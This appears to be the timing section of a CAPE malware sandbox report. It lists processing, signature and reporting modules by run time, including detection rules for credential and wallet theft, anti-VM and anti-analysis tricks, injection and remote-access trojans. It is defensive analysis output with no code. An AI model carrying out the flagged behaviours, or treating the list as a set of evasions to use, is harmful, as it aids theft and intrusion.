    • 0.151 static_dotnet
    • 0.065 Deduplicate
    • 0.03 AnalysisInfo
    • 0.028 TargetInfo
    • 0.017 Debug
    • 0.008 Strings
    • 0.006 peid
    • 0.001 ProcDump

    Signatures ( 0.38300000000000023 seconds )

    • 0.066 antiav_detectreg
    • 0.027 infostealer_ftp
    • 0.023 territorial_disputes_sigs
    • 0.017 masquerade_process_name
    • 0.015 antiav_detectfile
    • 0.015 infostealer_im
    • 0.014 antianalysis_detectreg
    • 0.009 infostealer_bitcoin
    • 0.009 ransomware_files
    • 0.008 stealth_timeout
    • 0.008 antianalysis_detectfile
    • 0.007 api_spamming
    • 0.007 decoy_document
    • 0.007 antivm_vbox_keys
    • 0.007 infostealer_mail
    • 0.006 antivm_vbox_files
    • 0.006 ransomware_extensions
    • 0.005 NewtWire Behavior
    • 0.005 antivm_vmware_keys
    • 0.005 network_cnc_http
    • 0.004 Doppelganging
    • 0.004 Unpacker
    • 0.004 qulab_files
    • 0.004 network_torgateway
    • 0.003 InjectionCreateRemoteThread
    • 0.003 injection_createremotethread
    • 0.003 persistence_autorun
    • 0.003 antivm_parallels_keys
    • 0.003 antivm_xen_keys
    • 0.003 geodo_banking_trojan
    • 0.003 predatorthethief_files
    • 0.003 recon_checkip
    • 0.002 InjectionProcessHollowing
    • 0.002 antidebug_guardpages
    • 0.002 antiemu_wine_func
    • 0.002 antivm_generic_disk
    • 0.002 betabot_behavior
    • 0.002 guloader_apis
    • 0.002 dynamic_function_loading
    • 0.002 exec_crash
    • 0.002 exploit_heapspray
    • 0.002 injection_runpe
    • 0.002 kibex_behavior
    • 0.002 malicious_dynamic_function_loading
    • 0.002 mimics_filetime
    • 0.002 antidbg_devices
    • 0.002 antivm_generic_diskreg
    • 0.002 antivm_vmware_files
    • 0.002 antivm_vpc_keys
    • 0.002 masslogger_files
    • 0.002 network_dns_opennic
    • 0.001 InjectionInterProcess
    • 0.001 antiav_avast_libs
    • 0.001 antidbg_windows
    • 0.001 antivm_generic_scsi
    • 0.001 antivm_generic_services
    • 0.001 antivm_vbox_libs
    • 0.001 bootkit
    • 0.001 exploit_getbasekerneladdress
    • 0.001 hancitor_behavior
    • 0.001 hawkeye_behavior
    • 0.001 infostealer_browser
    • 0.001 infostealer_browser_password
    • 0.001 kazybot_behavior
    • 0.001 kovter_behavior
    • 0.001 network_tor
    • 0.001 reads_self
    • 0.001 shifu_behavior
    • 0.001 stack_pivot
    • 0.001 stealth_file
    • 0.001 tinba_behavior
    • 0.001 vawtrak_behavior
    • 0.001 virus
    • 0.001 antivm_xen_keys
    • 0.001 antivm_hyperv_keys
    • 0.001 antivm_vbox_devices
    • 0.001 ketrican_regkeys
    • 0.001 browser_security
    • 0.001 bypass_firewall
    • 0.001 codelux_behavior
    • 0.001 darkcomet_regkeys
    • 0.001 disables_browser_warn
    • 0.001 azorult_mutexes
    • 0.001 network_dns_blockchain
    • 0.001 network_dns_doh_tls
    • 0.001 network_http
    • 0.001 revil_mutexes
    • 0.001 limerat_regkeys
    • 0.001 rat_pcclient
    • 0.001 recon_fingerprint

    Reporting ( 8.430999999999997 seconds )

    • 7.112 BinGraph
    • 1.193 JsonDump
    • 0.072 SubmitCAPE
    • 0.046 MITRE_TTPS
    • 0.008 PCAP2CERT